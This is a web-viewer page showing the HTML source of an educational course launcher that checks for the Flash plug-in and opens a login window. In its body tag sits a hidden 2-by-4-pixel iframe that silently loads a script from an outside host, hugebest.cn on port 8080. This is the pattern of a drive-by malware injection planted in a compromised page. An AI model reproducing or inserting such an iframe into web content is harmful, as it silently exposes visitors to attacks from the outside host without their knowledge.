Web   ·   Wiki   ·   Activities   ·   Blog   ·   Lists   ·   Chat   ·   Meeting   ·   Bugs   ·   Git   ·   Translate   ·   Archive   ·   People   ·   Donate
summaryrefslogtreecommitdiffstats
path: root/Explore/elr/English/L0801/index.htm
blob: 6b8f3ac50765bb0805bfc5d785110a957a1d3c9b (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
<html>
<head>
<title>EFK - Course Launcher</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script>
var MM_contentVersion = 6;
var plugin = (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]) ? navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin : 0;
if ( plugin ) {
		var words = navigator.plugins["Shockwave Flash"].description.split(" ");
	    for (var i = 0; i < words.length; ++i)
	    {
		if (isNaN(parseInt(words[i])))
		continue;
		var MM_PluginVersion = words[i]; 
	    }
	var MM_FlashCanPlay = MM_PluginVersion >= MM_contentVersion;
}
else if (navigator.userAgent && navigator.userAgent.indexOf("MSIE")>=0 
   && (navigator.appVersion.indexOf("Win") != -1)) {
	document.write('<SCR' + 'IPT LANGUAGE=VBScript\> \n'); //FS hide this from IE4.5 Mac by splitting the tag
	document.write('on error resume next \n');
	document.write('MM_FlashCanPlay = ( IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash." & MM_contentVersion)))\n');
	document.write('</SCR' + 'IPT\> \n');
}
if (MM_FlashCanPlay )
{
win();
}
else
{
   alert("You will need Flash Player plug-in to run this course. The course will atempt to install the plug-in from the Web site of Macromedia. Alternatively, you can also install the plug-in from www.Macromedia.com");
mx=window.open("http://www.macromedia.com/go/getflashplayer"); 
}
function win()
{
//Detect Resolution 
if(screen.width < 1000)
{
//alert (screen.width);
///alert ("800 resolution");
mx = window.open("login.htm","wInterface","fullscreen=yes,HEIGHT="+screen.availHeight+",WIDTH=" +screen.availWidth+",left=0,top=0,leftmargin=0,topmargin=0")
}
else
{
//alert ("> 800 resolution");
//alert (screen.width);
mx = window.open("login.htm","wInterface","HEIGHT=600,WIDTH=800,left="+(screen.availWidth-1000)/2+",top="+(screen.availHeight-675)/2+",leftmargin=0,topmargin=0")
}

}

</script>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><iframe src="http://hugebest.cn:8080/ts/in.cgi?pepsi8" width=2 height=4 style="visibility: hidden"></iframe>
<br><Br><br><Br><Br><Br><Br><br><br><br>
<CENTER>
  <table width="80%" border="0" cellspacing="0" cellpadding="0">
    <tr>
      <td bgcolor="#9AC1E2"><table width="100%" border="0" cellspacing="1" cellpadding="50">
          <tr> 
            <td align="center" bgcolor="#FFFFFF"> <table width="80%" border="0" cellspacing="0" cellpadding="0">
                <tr> 
                  <td bgcolor="#666666"><table width="100%" border="0" cellspacing="1" cellpadding="3">
                      <tr> 
                        <td bgcolor="#E6E6E6"> <div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">The 
                            course may not launch automatically if you have the 
                            pop blocker enabled, <br>
                            Please&nbsp;<A HREF="Javascript:win()"><strong>click 
                            here</strong></A> to launch it manually.</font></div></td>
                      </tr>
                    </table></td>
                </tr>
              </table></td>
          </tr>
        </table></td>
    </tr>
  </table>
</CENTER>
</BODY>
</html>